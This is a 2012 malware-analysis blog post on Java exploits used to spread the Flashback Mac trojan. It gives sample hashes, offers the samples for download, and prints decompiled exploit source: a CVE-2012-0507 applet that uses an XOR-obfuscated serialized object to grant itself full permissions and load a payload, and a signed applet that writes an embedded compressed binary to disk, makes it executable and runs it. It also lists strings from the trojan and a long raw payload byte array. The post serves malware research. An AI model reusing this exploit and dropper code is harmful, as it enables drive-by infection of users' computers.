Pages

Monday, April 16, 2012

Java OSX CVE-2012-0507, CVE-2011-3544 and Flashback.35/J sample




Dr. Web published BackDoor.Flashback.39 (Flashback.K-11th variant) epidemic chronology to augment their discovery of the Mac botnet "Doctor Web exposes 550 000 strong Mac botnet".  In general, the Flashback OSX epidemic started on or before August 2011 (F-Secure) with variants distributed as a fake Adobe Flash player. In January 2012, Intego reported Flashback.35/ J (the 10th) which was also distributed as a fake Flash download.

 I am posting here 3 Java exploits used to distribute Flashback trojans:

SAMPLE 1 JAVA CVE-2012-0507 is dated April 4, and appears to be distributing Flashback.35/J - as seen from the payload
SAMPLE 2 is java_signed_applet social engineering exploit (see Michael Schierl's comment below)
and 3 is JAVA CVE-2011-3544 and are dated February 2012.


I don't know which domains distributed these exploits (let me know if you do) but perhaps we are seeing the malware distribution scheme common for Windows-targeting exploit packs




File information


JAVA CVE-2012-0507 with Flashback.35/J payload


MD5:  0bb60cde26e022b8044149f7da138c1f
Size: 25891
 
JAVA 2011- 3544 

MD5:  d9d193658ea1555124854c3c827e4391
Size: 20989

 JAVA 2011- 3544 

MD5:  b134edeacd2660fa08f2f5a2ea916512
Size: 45797


Download

  Download all files listed above (email me if you need the password scheme)  - with many thanks to anonymous donation



Malware information


SAMPLE 1
JAVA CVE-2012-0507
MD5:  0BB60CDE26E022B8044149F7DA138C1F  -
Virustotal
First seen by Virustotal 2012-04-02 13:12:35 UTC ( 2 weeks ago ) 

apl.class Virustotal
{} are replaced by [] to prevent issues with blogger page saving posting and AV alerts

// Source File Name:   apl.java

package a;

import java.applet.Applet;
import java.io.*;
import java.util.concurrent.atomic.AtomicReferenceArray;

// Referenced classes of package a:
//            Help

public class apl extends Applet
[

    public apl()
    [
        sobj = "8BCA2722525527347C6B4D465146094B4649400968454D4244531CB7E97FB837540E4B2527275F57272727255255272E7C6B46096F424B571CD90BB336AF91C2D82527275F572727272657545527174D4651460952534E4B0944484944525555424953094653484A4E44096653484A4E44754241425542494442665555465E8EF5F9869942472B2527267C2722465555465E5327347C6B4D465146084B4649400868454D4244531C5F575627592724";
    ]

    public void init()
    [
        try
        [
            byte binary[] = loadFileFromResources("/xnm");
            byte arrayOfByte[] = StringToBytes(sobj);
            for(int i = 0; i < arrayOfByte.length; i++)
                arrayOfByte[i] = (byte)(arrayOfByte[i] ^ 0x27);

            ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(arrayOfByte));
            Object arrayOfObject[] = (Object[])(Object[])localObjectInputStream.readObject();
            Help arrayOfHelp[] = (Help[])(Help[])arrayOfObject[0];
            AtomicReferenceArray localAtomicReferenceArray = (AtomicReferenceArray)arrayOfObject[1];
            ClassLoader localClassLoader = getClass().getClassLoader();
            localAtomicReferenceArray.set(0, localClassLoader);
            Help.go(arrayOfHelp[0], binary);
        ]
        catch(Exception ex)
        [
            ex.printStackTrace();
        ]
    ]

    private static byte[] StringToBytes(String s)
    [
        byte data[] = new byte[s.length() / 2];
        for(int i = 0; i < s.length(); i += 2)
            data[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));

        return data;
    ]

    private byte[] loadFileFromResources(String fileName)
        throws IOException
    [
        InputStream fin = getClass().getResourceAsStream(fileName);
        byte readBuf[] = new byte[0x4b000];
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        for(int readCnt = fin.read(readBuf); 0 < readCnt; readCnt = fin.read(readBuf))
            bout.write(readBuf, 0, readCnt);

        fin.close();
        return bout.toByteArray();
    ]

    public static void main(String args[])
    [
        apl v = new apl();
        v.init();
    ]

    private String sobj;
]

Help.class Virustotal

// Source File Name:   Help.java

package a;

import java.lang.reflect.Constructor;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Help extends ClassLoader
[

    public Help()
    [
    ]

    public static void go(Help paramHelp, byte param[])
    [
        try
        [
            byte arrayOfByte[] = zn_data;
            URL localURL = new URL("file://");
            Certificate arrayOfCertificate[] = new Certificate[0];
            Permissions localPermissions = new Permissions();
            localPermissions.add(new AllPermission());
            ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(localURL, arrayOfCertificate), localPermissions);
            Class localClass = paramHelp.defineClass("a.Time", arrayOfByte, 0, arrayOfByte.length, localProtectionDomain);
            Constructor x[] = localClass.getConstructors();
            Object objlist[] = new Object[1];
            objlist[0] = param;
            Object znobj = x[1].newInstance(new Object[] [
                param
            ]);
        ]
        catch(Exception localException)
        [
            localException.printStackTrace();
        ]
    ]

Flashback.J /  BackDoor.Flashback.35 that is being dropped by the applet
File: xnm
MD5:  AE7BBF2410B0EFD0CBF1410EA41E07C6
Strings ( example taken form x64 binary)
 --------------------------------------------------------------------------
__PAGEZERO
__TEXT
__text
__TEXT
__symbol_stub1
__TEXT
__stub_helper
__TEXT
__cstring
__TEXT
__unwind_info
__TEXT
__eh_frame
__TEXT
__DATA
__nl_symbol_ptr
__DATA
__la_symbol_ptr
__DATA
__dyld
__DATA
__const
__DATA
__cfstring
__DATA
__data
__DATA
__common
__DATA
__LINKEDIT
/usr/lib/dyld
/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
/usr/lib/libz.1.dylib
/usr/lib/libcrypto.0.9.7.dylib
/System/Library/Frameworks/Security.framework/Versions/A/Security
/usr/lib/libgcc_s.1.dylib
/usr/lib/libSystem.B.dylib
/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
AWAVAUATSH
[A\A]A^A_
ATSH
0[A\
ATSH
AWAVAUATSH
8[A\A]A^A_
M{D~
ATSH
P[A\
AWAVAUATSH
w5&h
[A\A]A^A_
t&Hc
<9Ic
AUATSH
wpf9u
[A\A]
ATSH
HOME
User-Agent
/bin/sh
system.privilege.admin
prompt
icon
%s%s
%s "%s%s%s" %s "%s"
%s %s "%s"
sysctl.proc_cputype
dFd1js
IOPlatformUUID
%s|%s|%s|%s|%s|%s|%d
none
x86_64
i386
;//3F
Y/79.O
nunt
://3|UwO.79.uLk
tat_)TD
D://3
.79.
FGtat_
:://3)f
{.79.
9tat_mg
svic.
0TcchiY
/osry2-
rary)
tle U
ch|/B
lopet
plicg
ns/Xe
.app)
tentu
cOS/^
e|/Av
catii
Viruu
rier&
app|)
licar
s/iAh
irus)
tiVit
app|)
licar
s/avg
.appz
plicg
ns/Cj
av.av
Applo
ions)
PScoi
pp|/G
icato
/Pacm
Peepc
lica)
s/Mi>
oft
.app!
plic<
ns/M4
soft}
ice o
H|/Ap-
atio3
=icro.
 Off4
P2011!
plic<
ns/S6
.app]
ibra
ache
va/c
Nh_keo;
ibrax
pplii
on S
rt/./
urs/S8
ud/.l9
}allo3
ilib
pathyG
chct
tenv
C+D_IN
H3_LIB
H.ES "
ers/
ed/.
*cOSX
ironBy
tlts
_INS
LIBR
chct;
tenvW
a#6all
i);ri
T/.prhY
/.dl
/.vn&
EDl/.i.
pin/s



=========================================================================
SAMPLE 2
java_signed_applet social engineering exploit (see Michael Schierl's comment below)
d9d193658ea1555124854c3c827e4391 Virustotal
First seen by VirusTotal    2012-02-10 09:01:38 UTC ( 2 months ago
 {} are replaced by [] to prevent issues with blogger page saving posting and AV alerts
JavaUpdate.class  Virustotal
// Source File Name:   JavaUpdate.java

package javaupdate;

import java.applet.Applet;
import java.security.AccessController;

// Referenced classes of package javaupdate:
//            Payload

public class JavaUpdate extends Applet
[

    public JavaUpdate()
    [
    ]

    public void init()
    [
        Boolean boolean1 = (Boolean)AccessController.doPrivileged(new Payload());
    ]

    public static void main(String args[])
    [
        AccessController.doPrivileged(new Payload());
    ]
]



Payload.class  Virustotal
// Source File Name:   Payload.java

package javaupdate;

import java.io.*;
import java.security.PrivilegedAction;
import java.util.zip.DataFormatException;
import java.util.zip.Inflater;

class Payload
    implements PrivilegedAction
[

    Payload()
    [
    ]

    private void saveFile(String s, byte abyte0[])
        throws IOException
    [
        FileOutputStream fileoutputstream = new FileOutputStream(s);
        fileoutputstream.write(abyte0);
        fileoutputstream.close();
    ]

    private byte[] loadFileFromResources(String s)
        throws IOException
    [
        InputStream inputstream = getClass().getResourceAsStream(s);
        byte abyte0[] = new byte[0x4b000];
        ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
        for(int i = inputstream.read(abyte0); 0 < i; i = inputstream.read(abyte0))
            bytearrayoutputstream.write(abyte0, 0, i);

        inputstream.close();
        return bytearrayoutputstream.toByteArray();
    ]

    public Object run()
    [
        try
         [
            Inflater inflater = new Inflater();
            inflater.setInput(loader_data);
            ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream(loader_data.length);
            byte abyte0[] = new byte[1024];
            while(!inflater.finished())
                try
                [
                    int i = inflater.inflate(abyte0);
                    bytearrayoutputstream.write(abyte0, 0, i);
                ]
                catch(DataFormatException dataformatexception) { }
            bytearrayoutputstream.close();
            byte abyte1[] = bytearrayoutputstream.toByteArray();
            saveFile(dropFile, abyte1);
            String as[] = {
                "chmod", "777", dropFile
            ];
            Process process = Runtime.getRuntime().exec(as);
            int j = process.waitFor();
            String as1[] = {
                "nohup", dropFile, "&"
            ];
            Process process1 = Runtime.getRuntime().exec(as1);
            int k = process1.waitFor();
        ]
        catch(Exception exception)
        [
            exception.printStackTrace();
            return Boolean.valueOf(false);
        }
        return Boolean.valueOf(true);
    }

    byte loader_data[] = {
        120, -38, -19, 92, 13, 116, 91, -59, -107, -98,
        39, -53, 63, 4, -121, 40, -127, 64, -128, -4,
        -104, 68, 102, 3, 5, -53, -50, 95, 77, 78,
        114, 106, 37, 118, -112, -117, -100, 120, 99, 59,
        -55, 41, -95, -118, 44, -65, 68, 10, -78, -91,
        125, 122, 38, 14, 39, -128, -63, 113, -101, -121,
        -94, -42, 11, 101, -31, 116, 19, 78, 96, 105,
        -101, -78, -123, -11, 66, 97, -77, 41, -92, 38,
        -55, 33, -122, 66, 26, -78, 89, -106, -78, -39,
        -64, 82, -77, -107, 32, -48, 44, 39, -53, 111,
        -120, -10, -34, 59, 35, -23, -23, 89, -110, -45,
        61, -19, 2, -69, -17, -98, 51, 119, -34, -3,
        102, -26, -50, -52, 125, -13, -34, 60, -113, -18,
        -11, -117, 103, -9, -18, 99, -116, 89, 36, -58,
        74, 123, 25, 43, 98, -52, 6, -30, 117, 97,
        96, -27, -112, 74, 25, 97, -51, -112, -51, 62,
        35, 48, -109, 76, 50, -55, 36, -109, 76, 50,
        -55, 36, -109, 76, 50, -55, 36, -109, 76, 50,
        -23, 43, 70, -65, -2, -12, -67, -77, -16, 71,
        -66, 4, 127, -28, -9, 90, 64, -98, -128, 96,
        25, 99, -3, -94, -4, 82, 72, 46, 72, 30,
        79, -77, -13, -6, -122, 111, 53, -84, 92, 49,
        90, -121, 116, 14, -3, -96, -98, -39, 22, -44,
        -45, -38, -80, -90, 53, 71, -5, 10, 67, 3,
        33, -29, 1, 68, 49, -92, 18, 1, 123, 60,
        -86, -36, -93, 102, -86, 25, -11, 61, 112, 9,
        -41, -9, 94, 81, 70, -74, -24, -11, 90, 89,
        -81, 94, -12, 120, 34, -101, 59, -37, 67, 65,
        79, 68, -19, 110, -81, 25, -83, -17, 59, -105,
        115, 125, -113, 27, -28, 20, -107, 9, 125, -103,
        -15, -95, 34, -113, 95, 14, -122, 101, 37, -57,
        -8, -26, 77, -27, -19, -81, -79, 100, 100, 86,
        112, 124, -66, -120, -86, 4, -70, 54, -28, -103,
        -17, -70, -23, 92, -33, 94, -99, 92, -92, 107,
        111, 49, -88, -9, 120, -70, -69, 54, 5, -70,
        58, 60, -127, -82, -11, -95, 28, -6, 42, 102,
        112, 125, -83, 58, -39, 90, -32, -66, 122, 60,
        -78, -33, -77, 94, -15, 118, -54, -71, -57, -41,
        35, -12, 109, -45, -55, -6, -15, -99, 15, 67,
        -50, -67, 78, -22, -99, -83, -50, -20, -11, 64,
        118, -73, 101, -81, -113, -108, 44, 14, -86, 116,
        -9, -95, 43, -104, -70, -75, 97, 85, -55, -85,
        -81, 90, 39, -21, 109, -123, 122, -90, 101, -51,
        51, -24, 45, -92, -81, 90, -24, -117, -21, 100,
        -67, 62, 28, -33, -84, 44, 125, 29, -101, -125,
        29, 122, 57, 91, -33, -108, 43, -72, -66, 90,
        -99, 92, 84, -16, 62, -8, -42, -21, 23, -118,
        81, 95, -77, -48, -73, 78, 39, 23, -42, -41,
        -31, 85, -67, -7, -57, 55, 104, 24, -33, -32,
        -40, -29, 11, 117, 118, -122, -70, -14, -23, 99,
        51, -59, -3, 45, -53, 64, -59, 5, -34, 49,
        -103, -9, -110, -69, 113, -7, 13, 13, -11, -115,
        -87, 53, 87, -51, -21, -122, -49, -53, -56, 76,
        39, -105, 26, 116, -51, -44, -81, 1, 81, 127,
        -73, 78, -36, 13, -14, 54, -72, -111, -43, 115,
        25, -13, -117, -25, 105, 10, -66, 87, 64, -82,
        -60, 10, 95, 7, -35, 22, 90, -57, 116, 74,
        -102, 26, 107, 42, 89, 12, -9, 125, 20, 45,
        96, -84, 14, -41, -51, -4, 108, -5, 93, 32,
        -106, 56, 30, -72, 58, -70, 35, -118, 35, 24,
        104, 119, -24, -106, -52, -27, 98, 28, -41, -60,
        -2, -20, 55, 71, -82, -65, -79, -31, -44, -123,
        -1, -12, -44, -91, -18, -71, 63, 65, -101, -19,
        97, -4, -103, -67, -6, 75, -80, -65, -92, -34,
        -57, 99, 17, -50, -45, 47, -26, 100, 73, 63,
        -32, 18, 115, -76, 108, -114, -88, 114, -89, -61,
        29, 104, 87, -68, -54, 102, -57, 50, 124, -43,
        108, 10, 41, 55, 71, 28, 75, 67, -118, -36,
        34, 43, -73, 4, 124, 114, -92, 106, 125, 10,
        119, -84, -110, -107, 72, 32, -44, 21, 113, 56,
        -77, 106, -24, -6, 89, -109, -43, -49, -123, -46,
        24, -3, 52, -82, -72, 33, -96, -26, -18, -128,
        -118, -46, 122, 107, -77, -12, -14, 21, -112, -66,
        119, -112, 54, -8, 124, -98, 72, 85, 77, 21,
        -36, -58, 64, -69, 110, 60, -6, 118, 86, 41,
        52, -86, 29, 31, 90, -43, 18, 125, -61, 81,
        -10, -102, 116, 28, 58, -4, -85, -79, -20, -75,
        44, -44, -35, 5, 15, 54, 12, 63, -65, -59,
        50, 117, -52, -49, 35, -109, 76, 50, -55, 36,
        -109, 76, 50, -55, 36, -109, 76, 50, -55, 36,
        -109, 76, -6, -109, -46, 70, -26, -46, -34, 118,
        -11, -115, -100, 114, 69, 111, 43, 115, -59, -70,
        109, -38, -89, 125, -5, -91, -25, -34, 42, 114,
        73, 31, -72, -76, 87, -34, -75, -70, -6, -98,
        43, 115, -11, 93, -57, -70, 63, -60, -85, -8,
        56, -8, -21, 95, 59, 20, -65, -48, -54, -40,
        105, 103, -117, 59, 54, 109, 86, 60, -103, 116,
        -74, 36, 43, -25, -98, -57, -40, -124, 25, 44,
        89, 57, 7, 46, -38, 64, -87, 115, -75, 115,
        -107, -77, -51, -39, -38, -30, -22, 59, 57, -69,
        81, 59, -35, -88, -67, -22, -118, 22, 91, -53,
        24, 115, 69, 109, 46, -83, 109, -72, -26, -88,
        75, -109, -9, -72, -76, -77, 53, -55, -8, -67,
        69, 8, 79, 126, -65, 20, -77, 113, 46, 109,
        -65, 43, 54, -1, 82, 80, 4, 69, 46, 44,
        -46, 14, 52, -11, -113, -88, -109, -36, -38, 91,
        80, 80, 113, 30, 34, -121, -30, -13, -88, -28,
        4, -44, -87, -122, -85, 70, -19, 16, -126, 95,
        67, -16, -50, -109, -125, 51, 16, 121, -69, 41,
        122, 101, 67, -51, -121, -17, 94, -28, -46, 94,
        119, 107, -17, -69, -75, -33, -59, 55, 97, 85,
        -23, -72, 83, 58, -79, 119, 23, -44, 33, 52,
        25, -1, -52, 66, -99, -72, -6, -121, -18, 56,
        -26, -118, -54, 123, -22, 53, 48, -56, -8, -43,
        52, -100, -74, 97, -41, -36, -119, 106, 113, -4,
        66, -44, 28, -109, 95, -69, -47, -71, -42, 121,
        -109, -13, -37, 78, -49, 11, 7, -78, -25, 121,
        -25, -55, -35, 48, 59, 119, 116, -15, 12, 104,
        -41, 24, 45, 117, 105, 13, -61, 53, 67, -1,
        72, -57, -26, 79, 3, -33, -57, -58, -95, -122,
        -59, -98, 98, -58, -30, 18, 13, -7, 121, 87,
        -33, -57, -55, -18, -119, -15, -65, -121, -2, -5,
        106, 39, 118, -105, -62, 100, -2, -63, -126, -57,
        -20, 96, -32, -102, 15, -95, -14, 1, 80, 25,
        31, -50, -126, 6, -53, 1, 122, 10, -96, 67,
        -3, -49, 124, -108, 76, 34, -18, -118, 61, -123,
        -105, 80, 120, 47, -42, 95, -117, -45, -119, -51,
        -1, 28, 75, -94, -59, -69, 74, 24, -117, -42,
        -58, -99, 0, 58, -75, -125, 0, -36, 95, -126,
        -61, -100, 93, -13, -126, 91, 123, 7, -86, -99,
        -126, -31, -42, -125, 105, 46, 75, 27, 65, -67,
        18, 101, 43, -56, 53, 47, -20, -27, -6, -25,
        47, 44, -57, -46, 55, -30, 111, 73, 60, 63,
        -116, 121, 108, 103, 53, 118, -85, -99, -128, -98,
        31, -123, 122, -15, 5, -48, 6, -38, 111, 74,
        -96, 23, -89, 43, -70, -8, 120, 41, 53, -2,
        17, -106, -67, 35, -91, -11, -81, 110, -12, -99,
        118, 69, -97, 29, -92, -58, -49, -19, -91, 19,
        -19, 87, -124, -30, 103, 37, 106, -7, 48, -76,
        -36, -105, -124, -21, -8, 46, 2, 38, -1, 37,
        -87, -38, 57, -12, 25, -50, 115, -2, 42, 43,
        -43, -82, 25, -30, -11, -95, -35, 115, 18, 31,
        39, 13, 119, 113, 20, 106, -57, 123, 36, 52,
        -14, 65, -20, -79, -43, 29, 123, 108, 8, -70,
        19, 102, 116, 107, -65, -113, 43, 18, -34, -1,
        127, -89, -34, -9, 33, -116, -32, 13, 32, -3,
        2, -111, 81, 37, 53, 32, 37, 15, -12, 125,
        54, -89, 123, 4, 23, -46, -59, -44, -35, -30,
        89, -40, -113, 27, -82, -101, -6, 63, 84, -73,
        -72, -75, -113, -30, 87, -128, -16, -82, -62, 109,
        -14, 44, -36, -27, -8, 76, 9, 109, 50, 97,
        -85, 39, -103, 76, -2, -14, -47, 91, 75, 88,
        -4, 36, 26, 71, -21, -57, -23, -61, 83, 16,
        -101, 127, 98, 28, -17, -94, -105, 113, 11, 69,
        -25, -17, -128, 91, 84, 115, 20, -79, 32, 97,
        -121, 92, -79, -5, -72, -75, 78, -60, 31, 60,
        3, -113, -100, 118, 112, 113, 18, -42, -17, -124,
        -17, -99, 7, 90, 19, -9, -100, 5, 77, 67,
        -72, 86, 27, -25, 94, 2, 107, 21, 79, -25,
        93, 119, 30, -60, -11, -88, 91, -82, -16, 116,
        62, 2, -109, 73, 86, -2, -104, -8, 110, -30,
        -113, 18, -1, 25, -15, -57, -119, 15, 18, 127,
        -126, -8, -49, -119, 63, 77, 124, 15, -15, -67,
        -60, -97, 33, -66, -113, -8, 16, -15, -3, -60,
        15, 18, 127, -98, -8, 48, -15, 23, -119, -65,
        68, -4, 48, -15, 35, -60, -113, 18, 63, 70,
        -4, 85, -30, -81, 17, 127, -99, -8, 113, -68,
        -117, 125, -117, 15, -30, 89, -75, 58, 1, -34,
        51, 7, -32, 10, -33, 51, 79, -30, 83, -40,
        119, -80, 44, 113, 59, -84, 3, 60, -103, 100,
        80, 120, 24, -64, -60, -53, 96, -120, 1, -1,
        76, -114, 96, -61, -60, 47, 8, -7, 38, 71,
        -10, 34, -14, 83, 66, 20, -114, 12, 34, 114,
        63, 33, 119, 115, -28, -57, -120, -12, 19, -14,
        48, 71, 118, 32, 18, 33, -28, 73, -114, -36,
        -125, -120, -105, -112, 99, 28, -39, -122, -56, 10,
        66, -34, -25, -56, -19, -120, 44, 38, -28, 124,
        -119, 16, 21, -111, -81, -15, 17, 114, 100, 35,
        34, -105, -14, 17, 114, 100, 29, 34, -91, -124,
        108, -28, -56, 42, 68, -2, -21, 44, 34, -33,
        -27, -120, 27, -111, -33, 18, 114, 63, 71, -106,
        32, -14, 10, 33, -125, 28, -87, 69, -28, -105,
        -124, -20, -29, 72, 21, 34, -113, 17, -14, 43,
        -114, -40, 17, -7, 107, 66, 94, -25, -56, 101,
        -120, 104, -124, -60, 57, 98, 67, 100, 19, 33,
        31, 113, -92, 4, 17, -103, -112, 18, 11, 33,
        103, 32, 75, -76, 16, 50, -103, 35, 31, 32,
        -30, 36, -60, -50, -111, 56, 34, 14, 66, 22,
        112, -28, 4, 34, -45, 8, -71, -98, 35, -57,
        16, 57, -97, -112, -43, 28, 121, 17, -111, 79,
        62, 71, -92, -125, 35, 67, -120, -4, -114, -112,
        8, 71, -98, 70, -28, -97, 17, -71, -66, -95,
        -107, -75, 69, 100, -27, 90, -25, 6, -71, 75,
        101, 29, -2, 57, 29, 27, 35, -84, 113, -123,
        56, -106, 95, -24, -128, -21, -26, -96, 87, 93,
        31, 82, 58, -37, -38, 26, -21, 89, -6, -28,
        -38, 29, 80, -43, -96, 92, -47, -46, 21, 80,
        125, 126, -74, -87, -99, 117, -123, -4, -35, -31,
        -118, -103, -107, -111, -103, 21, 87, 50, 71, -67,
        124, -117, 28, 12, -123, 101, -59, -31, 12, -121,
        -125, 1, 31, 29, 88, 71, 28, 107, 124, -95,
        14, -71, -54, 27, 14, 59, -106, -122, -70, 84,
        -24, 50, -30, 104, -14, -6, 86, -76, -16, 2,
        -58, -4, -86, 26, 94, -24, 112, 124, -67, -74,
        106, -34, -126, -86, -102, -71, -41, 85, -51, -87,
        -87, 113, 108, -12, -123, -70, -95, -78, -30, 96,
        14, -75, 51, -20, -88, 82, 59, -28, 78, -79,
        15, -29, -101, 102, -86, -56, 43, 4, 86, -63,
        -78, 127, -37, -85, 21, 73, -86, -56, -56, 69,
        116, 70, 95, -60, -90, -120, 95, 63, -34, -65,
        -124, 73, -8, -37, -15, 43, 107, -118, 9, -72,
        40, -91, -1, -42, -107, 76, -22, -79, 73, -74,
        -14, -46, -78, 1, 40, -103, 39, -6, 91, -11,
        113, -110, 40, -11, 123, 34, -77, 98, -77, 11,
        108, -33, -79, 88, 81, -11, -8, 18, -21, 120,
        -56, -6, 74, -73, -105, -60, -118, -65, 103, -3,
        126, 17, -74, -61, -97, -64, 74, 62, -31, -19,
        -2, -50, -110, -81, -99, 45, -85, -35, 31, -6,
        93, -78, 74, -4, 126, -19, 23, -7, -83, 34,
        -33, 46, -14, 7, 69, 62, 40, -14, -3, 34,
        63, 38, -14, -1, 16, -7, -57, 34, 31, 55,
        77, -40, 88, -28, 85, 34, -81, 19, -7, 74,
        -111, 119, -120, -4, 22, -111, 111, 19, -7, 15,
        69, -2, 51, -111, -17, 19, -7, 17, -111, -65,
        37, -14, -45, 34, 47, 17, -65, -105, 79, 17,
        -7, -43, 34, 95, 36, -14, -27, -45, 83, -65,
        51, 15, 121, -110, 119, 48, 86, 38, -14, -44,
        90, 24, 22, -65, 123, 14, -119, 124, -113, -56,
        83, -65, -121, -90, 104, -72, -108, -25, -87, -33,
        -25, -115, -122, 78, -107, 119, -120, -14, 113, 121,
        -54, -17, 18, -27, 23, -100, -29, -3, 57, 37,
        -22, 79, 16, -65, -69, 39, 33, 125, 106, 126,
        78, -101, 100, -110, 73, 38, -103, 100, -110, 73,
        38, -103, 100, -110, 73, 38, -3, -65, -89, -119,
        117, -98, -101, -105, 46, 115, -75, -74, 54, 11,
        47, -64, 26, 79, 13, -5, 115, 101, -54, -64,
        36, 40, 104, 92, -47, -28, -115, -88, -78, -46,
        28, 82, -44, 122, 121, -67, -73, 59, -88, -78,
        -127, -117, -22, 60, -24, -28, -18, -11, -35, -20,
        -15, -7, 111, -10, 108, -24, -10, 42, 29, 76,
        -79, 13, -44, -95, 119, 42, -9, 126, 111, 15,
        116, 117, -56, 10, 83, -40, -64, 100, -84, -68,
        116, -39, -46, 80, 23, -76, -24, 82, 91, -56,
        67, 121, 105, -48, 27, -119, -84, -108, -41, -53,
        -118, -36, -27, -109, 89, -17, -80, 101, -56, 50,
        101, -128, 6, -30, 12, 6, 67, 62, -81, 26,
        82, 82, -35, 41, -77, 7, 104, -100, 74, 53,
        -116, -108, 15, -76, 73, -114, 68, -68, 27, -28,
        -91, -118, -20, 85, -27, -107, -14, 95, 116, -53,
        17, 24, 22, 83, 106, -115, 53, 90, 100, -43,
        37, 123, 97, 36, -53, 2, 114, -80, 99, -107,
        55, -40, 45, 99, -67, 58, -86, -73, 18, 74,
        96, 56, -78, -73, -109, 43, 90, 22, 82, -80,
        -87, 78, -97, 107, 114, 118, -67, 21, 97, -71,
        11, -15, 102, 3, -114, 87, -120, -81, 17, 120,
        80, -10, 70, -88, -93, 117, 4, -120, 57, 83,
        39, -85, 3, -86, 127, 41, 7, -80, -126, 95,
        87, -31, 122, 89, -43, -107, -124, -87, -92, 109,
        -91, 59, -45, 46, 83, -40, 3, -9, -90, 113,
        -59, -118, -10, -115, -78, 79, -43, 117, -41, 43,
        17, -66, 82, -34, 16, -120, -88, -54, -26, -122,
        46, 96, -68, -7, -46, 101, -51, 10, 30, -107,
        -87, -101, -79, -34, -74, 28, -11, -106, 41, -95,
        -50, 102, -81, -22, -57, -14, 1, 9, 111, -15,
        -14, 22, 24, 81, 67, -113, -20, -21, 86, -67,
        -19, 65, 57, 85, -8, 0, 21, 122, 100, 69,
        9, 41, 40, -17, -110, 12, -21, 97, -67, 55,
        16, -60, -126, -35, 88, -32, -13, 119, -122, -56,
        54, -125, 40, -55, 61, 1, 50, -20, 30, 20,
        -42, -5, -126, 33, 62, -18, 33, 18, 67, -62,
        -70, -61, 36, 109, 82, 2, 42, 21, 30, 65,
        -79, -45, -117, -53, 2, -59, -41, 72, -108, 59,
        125, 97, -102, -54, -101, 66, -116, -56, -92, 56,
        -114, 98, 68, -18, -12, -92, 117, -97, 74, 33,
        41, -11, 31, 19, 16, 6, 83, -86, -21, -55,
        104, 22, -108, 85, 47, -75, -33, 70, 2, 57,
        -48, -110, 33, 80, -20, -18, 10, 6, -70, 110,
        102, 3, -87, 7, 70, -14, 120, 58, -3, 48,
        21, 52, -116, -20, -15, -45, -6, 98, -105, 88,
        -2, -40, -49, -27, 77, -96, 113, 17, -28, 75,
        26, -68, -28, 6, 111, -91, 51, 36, 91, -6,
        28, 106, 10, -27, 82, -6, -56, 105, -98, 65,
        94, 101, -112, 123, -72, -100, 118, -87, -65, -37,
        32, -17, 48, -56, 63, 49, -56, -5, 13, -14,
        -85, 6, -7, 61, 46, -89, -19, 112, -42, 32,
        -49, -112, -78, -27, 90, 46, -89, 67, 75, -106,
        -109, -100, 113, -7, 15, 27, -54, 55, 27, -28,
        40, -81, -97, -106, 31, 52, -108, -1, -56, 32,
        -1, -83, 65, 126, -46, 32, -17, 53, -56, -5,
        13, -29, -7, 23, 46, -89, -19, -7, 14, 23,
        50, -9, -35, -110, -35, -66, -52, 32, -37, 12,
        -14, 20, -125, 60, -53, 32, 95, 107, -112, 23,
        24, -28, 69, 6, -71, -34, 32, -69, 45, -39,
        -10, 105, -106, 40, -74, -21, -126, -80, -56, 7,
        68, 110, 17, 103, -109, 88, 49, 21, 103, -123,
        71, -113, 24, -122, 113, -98, 56, -105, -60, -40,
        6, -12, 55, 31, 47, -50, 33, 113, 21, 78,
        -124, 116, 33, -29, -25, -40, -109, 33, 93, 12,
        -23, 18, -58, -29, 18, -16, -4, 26, 99, 103,
        -90, -29, 125, 103, -4, -68, -4, 10, -58, 99,
        45, 68, 44, 68, 29, -90, 73, -116, -57, 113,
        92, -58, 50, 126, -20, 95, -64, 88, 88, -82,
        39, -70, -48, 94, 51, -10, 46, 51, -10, -2,
        50, 122, 103, 25, -67, -89, -24, 118, -109, 2,
        -5, 72, -82, 29, 36, -49, -34, 49, 106, -41,
        24, 115, -69, -56, -69, 79, -28, -34, 32, -58,
        -34, -20, -45, 123, -57, -24, 77, 35, -57, 103,
        -123, -40, 64, -8, -50, -111, -38, 50, -60, 94,
        -111, -38, 36, 114, 126, 54, -28, -8, -88, -55,
        -3, 57, -109, -38, 91, 82, -101, 74, 106, 55,
        -47, 109, 35, -103, -3, 35, -67, 113, -16, 29,
        35, -75, 85, -92, -10, -120, -47, 31, 64, -34,
        14, 101, -95, -61, 49, 127, 65, -51, -68, -7,
        -13, -26, -104, 31, -101, 38, -103, 100, -110, 73,
        38, 125, 105, -24, 48, -113, -1, -89, -17, -82,
        84, -4, 127, -72, -124, -57, -1, -89, -30, 123,
        115, -58, -2, -37, -14, -21, 36, 127, 0, 41,
        71, -84, -65, 77, -41, -50, -106, -119, -19, 47,
        78, 127, -121, 21, -114, -19, 63, 14, 31, 117,
        17, -8, 56, 68, -33, -75, 124, 49, -3, 89,
        -15, -4, 57, 116, 52, 79, -27, -79, -4, -51,
        -27, -7, -29, -8, -57, -118, -31, 63, 11, 58,
        78, 67, -29, -77, -58, -1, -122, -104, 53, -114,
        -62, 113, -5, -89, -89, -13, -104, -3, -45, 23,
        100, -49, 69, 127, 61, 86, -84, 62, -6, 82,
        98, 12, -12, -32, -124, -4, 49, -6, -28, 11,
        33, -27, -114, -89, 79, -33, 15, 91, -82, -8,
        -7, -62, -15, -23, -40, 126, -86, -72, -113, -7,
        -2, -8, 29, 43, 102, 126, 42, -24, -64, -37,
        61, -43, 54, 58, 86, 126, 90, 90, 71, -31,
        56, -2, -127, 10, -2, -73, -61, -128, 109, 116,
        -4, -2, -62, -52, -67, 40, 24, 27, -65, -69,
        -126, -57, -128, -17, 46, 56, -105, -62, -15, -16,
        -81, -127, -114, 107, 48, 47, -88, -93, 112, 12,
        124, -59, 21, 44, 29, -1, -98, 47, -10, 61,
        -13, 76, -114, -114, 123, 63, 83, -58, -17, 11,
